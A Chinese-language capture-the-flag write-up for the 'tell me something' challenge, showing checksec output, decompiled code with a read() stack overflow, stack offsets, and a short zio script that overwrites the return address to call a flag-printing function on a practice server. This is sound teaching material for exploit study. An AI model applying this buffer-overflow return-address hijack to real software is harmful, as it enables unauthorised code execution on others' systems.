tell me something

Posted on | In

0x01 寻找漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
xfgg@ubuntu:~/Downloads$ file guestbook.d3d5869bd6fb04dd35b29c67426c0f05 
guestbook.d3d5869bd6fb04dd35b29c67426c0f05: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 2.6.32, BuildID[sha1]=7429502fc855237f3f8eeceb262ddcf6b2c2854e, not stripped

64位程序

xfgg@ubuntu:~/Downloads$ checksec guestbook.d3d5869bd6fb04dd35b29c67426c0f05
[*] '/home/xfgg/Downloads/guestbook.d3d5869bd6fb04dd35b29c67426c0f05'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

只开启nx保护

ida分析

int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+0h] [rbp-88h]

  write(1, "Input your message:\n", 0x14uLL);
  read(0, &v4, 0x100uLL);
  return write(1, "I have received your message, Thank you!\n", 0x29uLL);
}
有个read栈溢出漏洞 

int good_game()
{
  FILE *v0; // rbx
  int result; // eax
  char buf; // [rsp+Fh] [rbp-9h]

  v0 = fopen("flag.txt", "r");
  while ( 1 )
  {
    result = fgetc(v0);
    buf = result;
    if ( (_BYTE)result == -1 )
      break;
    write(1, &buf, 1uLL);
  }
  return result;
}

有个fopenflag 就很简单了 溢出返回就可以了

0x02 思路分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
查看main函数的栈
-0000000000000088                 db ? ; undefined
-0000000000000087                 db ? ; undefined
-0000000000000086                 db ? ; undefined
-0000000000000085                 db ? ; undefined
-0000000000000084                 db ? ; undefined

0x88位就可以溢出

查看good_game的地址
.text:0000000000400620                 push    rbx
.text:0000000000400621                 mov     esi, offset modes ; "r"
.text:0000000000400626                 mov     edi, offset filename ; "flag.txt"
.text:000000000040062B                 sub     rsp, 10h
.text:000000000040062F                 call    _fopen
.text:0000000000400634                 mov     rbx, rax
.text:0000000000400637                 jmp     short loc_400654

0x400620为sys_addr

exp

1
2
3
4
5
6
7
学习使用zio库

import zio
payload = "A" * 0x88 + "\x20\x06\x40\x00\x00\x00\x00\x00"
p = zio.zio(("pwn.jarvisoj.com", 9876))
p.write(payload)
p.interact()
0%